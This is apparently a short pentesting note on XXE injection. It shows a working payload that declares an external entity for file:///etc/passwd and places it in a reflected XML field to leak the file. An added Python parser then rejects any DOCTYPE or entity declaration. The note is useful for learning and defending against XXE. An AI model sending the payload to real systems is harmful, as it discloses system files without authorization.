Don’t know how to identify it. I guess just go in guns blazing on any XML.
Looking at this xml:
<?xml version="1.0" encoding="UTF-8"?>
<root>
<subtotal>undefined</subtotal>
<userid>1206</userid>
</root>
We can create this reference:
<!DOCTYPE xxe [
<!ENTITY filedisclosure SYSTEM "file:///etc/passwd">
]>
Add it above <root>, then reference filedisclosure in a field whose value is reflected in the output. In this case, userid is reflected as 1206, so we change its value to &filedisclosure; as follows:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY filedisclosure SYSTEM "file:///etc/passwd">
]>
<root>
<subtotal>undefined</subtotal>
<userid>&filedisclosure;</userid>
</root>
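From the defending side, the payload above only works if the parser accepts a DOCTYPE and resolves its entities. The following is an added example, not code from the original note: a Python parser built on the standard library's expat bindings that rejects any document declaring a DTD or entity before the reference is ever reached. The helper name parse_fields and the ForbiddenXML exception are hypothetical; the two sample documents are the ones shown above.

```python
import xml.parsers.expat

# Documents taken from the note above: the normal request and the XXE payload.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<root>
<subtotal>undefined</subtotal>
<userid>1206</userid>
</root>"""
PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY filedisclosure SYSTEM "file:///etc/passwd">
]>
<root>
<subtotal>undefined</subtotal>
<userid>&filedisclosure;</userid>
</root>"""


class ForbiddenXML(ValueError):
    """The document declares a DTD or an entity."""


def parse_fields(xml_bytes):  # hypothetical helper name
    """Return {tag: text} for leaf elements; refuse any DOCTYPE or entity."""
    fields, text = {}, []

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # Fires while the internal subset is read, before any &name; is reached.
        raise ForbiddenXML(f"entity {name!r} -> {system_id or value!r}")

    def on_doctype_end():
        # A DTD without entity declarations is still refused.
        raise ForbiddenXML("DOCTYPE declaration not allowed")

    def on_end(tag):
        value = "".join(text).strip()
        if value:
            fields[tag] = value
        text.clear()

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity
    parser.EndDoctypeDeclHandler = on_doctype_end
    parser.StartElementHandler = lambda tag, attrs: text.clear()
    parser.CharacterDataHandler = text.append
    parser.EndElementHandler = on_end
    parser.Parse(xml_bytes, True)
    return fields


if __name__ == "__main__":
    print(parse_fields(BENIGN))
    try:
        parse_fields(PAYLOAD)
    except ForbiddenXML as exc:
        print("rejected:", exc)
```

The exception message carries the entity name and system identifier, which is the detail worth logging when such a request is refused.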
